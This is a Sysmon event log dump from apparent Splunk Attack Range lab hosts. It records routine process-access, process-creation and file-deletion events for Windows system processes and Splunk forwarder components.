10341000x8000000000000000205975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.424{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.424{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.424{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.424{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.424{2E1864BB-E13C-6299-0500-000000005F02}416780C:\Windows\system32\csrss.exe{2E1864BB-18DE-629A-6342-000000005F02}2256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.424{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18DE-629A-6342-000000005F02}2256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.425{2E1864BB-18DE-629A-6342-000000005F02}2256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.355{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=903069275BDBC26D35DB9F1F8E1F2388,SHA256=1100C2C048090F389DF0C7E33809008655EF4C6509598D4FE6596A29F3C53D50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.355{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68F98A428DEB6838760594A5F70DA5B1,SHA256=5EE99709E5D85EBD4AF666B6266192B5E1A1E77CD86717B21796A1D035D2E96C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.355{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E13E-6299-1600-000000005F02}1328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.355{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E13E-6299-1600-000000005F02}1328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.355{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E13E-6299-1600-000000005F02}1328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044785Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:18.064{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D476B069896B22D564EF51474B3AC307,SHA256=AEB9257B1D0A9AB16DCBFF53A0AA05667AED7FB88B6FD3089FDEC8BBF4A27D2A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:18.040{2E1864BB-18DD-629A-6242-000000005F02}81884936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.827{2E1864BB-18DF-629A-6542-000000005F02}73282812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.597{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18DF-629A-6542-000000005F02}7328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.597{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.597{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.597{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.597{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.597{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-18DF-629A-6542-000000005F02}7328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.597{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18DF-629A-6542-000000005F02}7328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.592{2E1864BB-18DF-629A-6542-000000005F02}7328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.396{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D61D775B1136A68A6602F6C61BFB530,SHA256=37B2C46EA8286F8301A77DD33A2D10FA5C3600516DE45224EB74322993029C9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044786Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:19.158{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DB635C055C6126F787A22042FAC414A,SHA256=1783AA8B5561BC425330BCE4C2B760417AF356DCF877F3B48E78E3B1C6CA1A92,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.358{2E1864BB-18DF-629A-6442-000000005F02}57607340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.092{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18DF-629A-6442-000000005F02}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.092{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.092{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 